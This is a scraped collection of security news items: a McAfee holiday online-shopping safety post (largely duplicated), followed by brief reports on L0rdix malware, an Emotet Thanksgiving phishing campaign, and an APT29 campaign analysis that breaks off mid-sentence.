  2. Beware of malicious links. The most common forms of fraud and cyber attacks are phishing scams and socially-engineered malware. Check links before you click them and consider using McAfee® WebAdvisor, a free download that safeguards you from malware and phishing attempts while you surf — without impacting your browsing performance.
  3. Don’t shop on unsecured wi-fi. Most public networks don’t encrypt transmitted data, which makes all your online activity on public wi-fi vulnerable to hackers. Resist shopping on an unsecured wireless network (at a coffee shop, library, airport). Instead, do all of your online shopping from your secure home computer. If you have to conduct transactions on a public Wi-Fi connection use a virtual private network (VPN) such as McAfee® SafeConnect to maintain a secure connection in public places. To be sure your home network is safe, secure your router.
  4. Is that site legit? Before purchasing a product online, check the URL carefully. If the address bar says “HTTP” instead of “HTTPS” in its URL, do not purchase from the site. As of July 2018, unsecured sites now include a “Not Secure” warning, which is very helpful to shoppers. Also, an icon of a locked padlock will appear to the left of the URL in the address bar or the status bar down below depending on your browser. Cybercriminals can make a fake site look very close to the real thing. One added step: Google the site if anything feels wrong about it, and you may find some unlucky consumers sharing their stories.
  5. Review bills closely. Review your credit card statements in January and February, when your holiday purchases will show up. Credit cards offer better fraud protection than debit. So, if you’re shopping online during the holidays, give yourself an extra layer of protection from scams by using a credit card. Think about using the same card between family members to make checking your bill easier.
  6. Create new, strong passwords. If you are getting ready to do a lot of shopping online, it’s a great time to update your passwords. Download a free password manager, which auto-saves and enters your passwords, so you don’t have to. The True Key app protects your passwords by scrambling them with AES-256, one of the most robust encryption algorithms available.
  7. Verify charities. One of the best things about the holidays is the spirit of giving. Hackers and crooks know this and are working hard to trick innocent givers. This reality means that some seasonal charities may be well-devised scams. Before you donate, be sure to do a little research. Look at the website’s URL; it’s design, its security badges. Google the charity and see if any scams have been reported.
  8. Protect your data from third parties. Sites may contain “third parties,” which are other embedded websites your browser talks to such as advertisers, website analytics engines, that can watch your browsing behavior. To protect your data when shopping and get rid of third-party access, you need to wipe your cookies (data trackers) clean using your settings, then change your browser settings (choose “block third-party cookies and site data”) to make sure the cookies can’t track your buying behavior. You can also go into your settings and direct your browser to shop in private or incognito mode.

No one is immune to holiday scams. Many scams are intricately designed and executed so that even the savviest consumer is duped. You can enjoy the shopping that comes with the holidays by keeping these few safety precautions in mind. Don’t let your emotional desire for that perfect gift override your reasoning skills. Listen to your intuition when it comes to suspicious websites, offers, emails, pop-up ads, and apps. Pause. Analyze. And make sure you are purchasing from a legitimate site.

Stay safe and WIN: Now that you’ve read about safe shopping basics, head over to our Protect What Matters site. If you successfully complete the Holiday Online Shopping Adventure quiz, you can enter your email address for the chance to win a tech prize pack with some of this season’s hottest smart gadgets. Have fun, and stay safe online this holiday season!

 

The post 8 Ways to Secure Your Family’s Online Holiday Shopping appeared first on McAfee Blogs.



McAfee Blogs

8 Ways to Secure Your Family’s Online Holiday Shopping

It’s officially the most wonderful time of the year — no doubt about it. But each year, as our reliance and agility on our mobile devices increases, so too might our impulsivity and even inattention when it comes to digital transactions.

Before getting caught up in the whirlwind of gift giving and the thrill of the perfect purchase, consider taking a small pause. Stop to consider that as giddy as you may be to find that perfect gift, hackers are just as giddy this time of year to catch shoppers unaware and snatch what they can from the deep, digital holiday coffers. In fact, according to the FBI’s Internet Crime Complaint Center, the number one cybercrime of 2017 was related to online shopping; specifically, payment for or non-delivery of goods purchased.

8 Ways to Secure Your Family’s Holiday Shopping Online

  1. Make it a family discussion. Make no assumptions when it comes to what your kids do and do not understand (and practice) when it comes to shopping safely online. Go over the points below as a family. Because kids are nearly 100% mobile, online shopping and transactions can move swiftly, and the chances of making a mistake or falling prey to a scam can increase. Caution kids to slow down and examine every website and link in the buying journey.
  2. Beware of malicious links. The most common forms of fraud and cyber attacks are phishing scams and socially-engineered malware. Check links before you click them and consider using McAfee® WebAdvisor, a free download that safeguards you from malware and phishing attempts while you surf — without impacting your browsing performance.
  3. Don’t shop on unsecured wi-fi. Most public networks don’t encrypt transmitted data, which makes all your online activity on public wi-fi vulnerable to hackers. Resist shopping on an unsecured wireless network (at a coffee shop, library, airport). Instead, do all of your online shopping from your secure home computer. If you have to conduct transactions on a public Wi-Fi connection use a virtual private network (VPN) such as McAfee® SafeConnect to maintain a secure connection in public places. To be sure your home network is safe, secure your router.
  4. Is that site legit? Before purchasing a product online, check the URL carefully. If the address bar says “HTTP” instead of “HTTPS” in its URL, do not purchase from the site. As of July 2018, unsecured sites now include a “Not Secure” warning, which is very helpful to shoppers. Also, an icon of a locked padlock will appear to the left of the URL in the address bar or the status bar down below depending on your browser. Cybercriminals can make a fake site look very close to the real thing. One added step: Google the site if anything feels wrong about it, and you may find some unlucky consumers sharing their stories.
  5. Review bills closely. Review your credit card statements in January and February, when your holiday purchases will show up. Credit cards offer better fraud protection than debit. So, if you’re shopping online during the holidays, give yourself an extra layer of protection from scams by using a credit card. Think about using the same card between family members to make checking your bill easier.
  6. Create new, strong passwords. If you are getting ready to do a lot of shopping online, it’s a great time to update your passwords. Download a free password manager, which auto-saves and enters your passwords, so you don’t have to. The True Key app protects your passwords by scrambling them with AES-256, one of the most robust encryption algorithms available.
  7. Verify charities. One of the best things about the holidays is the spirit of giving. Hackers and crooks know this and are working hard to trick innocent givers. This reality means that some seasonal charities may be well-devised scams. Before you donate, be sure to do a little research. Look at the website’s URL; it’s design, its security badges. Google the charity and see if any scams have been reported.
  8. Protect your data from third parties. Sites may contain “third parties,” which are other embedded websites your browser talks to such as advertisers, website analytics engines, that can watch your browsing behavior. To protect your data when shopping and get rid of third-party access, you need to wipe your cookies (data trackers) clean using your settings, then change your browser settings (choose “block third-party cookies and site data”) to make sure the cookies can’t track your buying behavior. You can also go into your settings and direct your browser to shop in private or incognito mode.

No one is immune to holiday scams. Many scams are intricately designed and executed so that even the savviest consumer is duped. You can enjoy the shopping that comes with the holidays by keeping these few safety precautions in mind. Don’t let your emotional desire for that perfect gift override your reasoning skills. Listen to your intuition when it comes to suspicious websites, offers, emails, pop-up ads, and apps. Pause. Analyze. And make sure you are purchasing from a legitimate site.

Stay safe and WIN: Now that you’ve read about safe shopping basics, head over to our Protect What Matters site. If you successfully complete the Holiday Online Shopping Adventure quiz, you can enter your email address for the chance to win a tech prize pack with some of this season’s hottest smart gadgets. Have fun, and stay safe online this holiday season!

 

The post 8 Ways to Secure Your Family’s Online Holiday Shopping appeared first on McAfee Blogs.

L0rdix malware on dark web steals data, mines crypto & enslaves PCs as botnet

By Waqas

There’s a new hacking tool circulating in the underground Dark Web forums that let cybercriminals target Microsoft Windows computers. It has become the newest universal go-to tool to attack a Windows machine because it presents an utterly lethal combination of data stealing, cryptomining, and snooping capabilities. Discovered by Ben Hunter, a security researcher at ENSILO, […]

This is a post from HackRead.com Read the original post: L0rdix malware on dark web steals data, mines crypto & enslaves PCs as botnet

New Emotet Thanksgiving campaign differs from previous ones

Researchers from Forcepoint observed a new Emotet Thanksgiving-themed campaign that appears quite different from previous ones.

Security researchers from Forcepoint have observed a new Emotet Thanksgiving-themed campaign that appears quite different from previous ones.

EMOTET, aka Geodo, is a banking trojan linked to the dreaded Dridex and Feodo (CridexBugat)  malware families.

In past campaigns, EMOTET was used by crooks to steal banking credentials and as a malicious payload downloader.

According to the experts, the Thanksgiving-themed campaign targeted U.S. users this week.

“After a hiatus of some weeks, we observed Emotet returning in mid-November with upgraded macro obfuscation and formatting.  On 19 November, it began a US-centric Thanksgiving-themed campaign. As many will know this is a departure from the standard financial themes regularly seen.” reads the analysis published by Forcepoint.

The new campaign leverages an improved variant of the malware that implements new features and modules, experts pointed out that this is the first campaign that doesn’t use financial themes.

The crooks behind the recent Emotet campaign sent out roughly 27,000 messages daily, below a sample of the Thanksgiving-themed message:

Emotet

The attachment is an XML file masquerading as a .doc with embedded macros leading to a standard PowerShell downloader normally observed with Emotet banking Trojan, which is also used by crooks to drop other payloads.

“However, the document in this case is not the usual .doc or .docx but rather an XML file masquerading as a .doc, and the macro in this instance makes use of the Shapes feature, ultimately leading to the calling of the shell function using a WindowStyle of vbHide.” continues the expert.

The macro has been recently evolved from the Emotet pattern, in implements upgraded macro obfuscation and formatting.

“In the few weeks since Emotet returned it has undergone some interesting changes, most notably in the new Thanksgiving theme and macro obfuscation discussed previously.” concludes Forcepoint.

“Whilst not completely novel (use of XML files to conceal macros was reported by Trustwave back in 2015) it does pose a challenge to defenders due to the sheer volume of emails sent, as detection signatures need to be rapidly created to stem the onrushing tide.”

Further details, including IoCs are reported in the analysis published by the experts.

Pierluigi Paganini

(Security Affairs – banking trojan, spam)

 

The post New Emotet Thanksgiving campaign differs from previous ones appeared first on Security Affairs.

Exclusive Cybaze ZLab – Yoroi – Hunting Cozy Bear, new campaign, old habits

The experts at Cybaze ZLab – Yoroi continue the analysis of new strain of malware used by the Russia-linked APT29 cyberespionage group (aka Cozy Bear)

The experts at Cybaze ZLab – Yoroi continue the analysis of new strain of malware used by the Russia-linked APT29 cyberespionage group (aka The DukesCozy Bear, and Cozy Duke).

The researchers of Yoroi ZLab, on 16 November, accessed to a new APT29’s dangerous malware which seems to be involved in the recent wave of attacks aimed at many important US entities, such as military agencies, law enforcement, defense contractors, media companies and pharmaceutical companies.

Threat actors carried out spear phishing attacks impersonating a State Department official to attempt compromising targets

The experts discovered that Cozy Bear cyberspies used in the last campaign a technique to drop malicious code that was already employed by threat actors.

APT29 along with APT28 cyber espionage group was involved in the Democratic National Committee hack and the wave of attacks aimed at the 2016 US Presidential Elections.

The same technique has been used by the APT group back in 2016 when the Cozy Bear in the aftermath of the US Presidential Election.

At the time, Cozy Bear hackers carried out spear-phishing attack using a zip file containing a weaponized self-extracting link file that drops a decoy document and the final payload.

Cozy Bear attack 2.png

The researchers at Cybaze ZLab – Yoroi pointed out that the technique used to avoid detection is very sophisticated.

“The usage of a link file containing the complete payload is a powerful technique, still hard to detect by several common anti-virus solutions. Despite the effectiveness of this strategy, the creation of the weaponized LINK such the one analyzed is quite easy,  many publicly available resources could help crooks to abuse it.” reads the analysis published by Cybaze ZLab – Yoroi researchers.

The C2C “pandorasong[.]com” recalls the legit “pandora.com” domain name, one of the most popular music streaming service in the US. Moreover, the requests sent by the malware are forged to look like as legit Pandora traffic, using information publicly available on GitHub.

According to FireEye’s report the f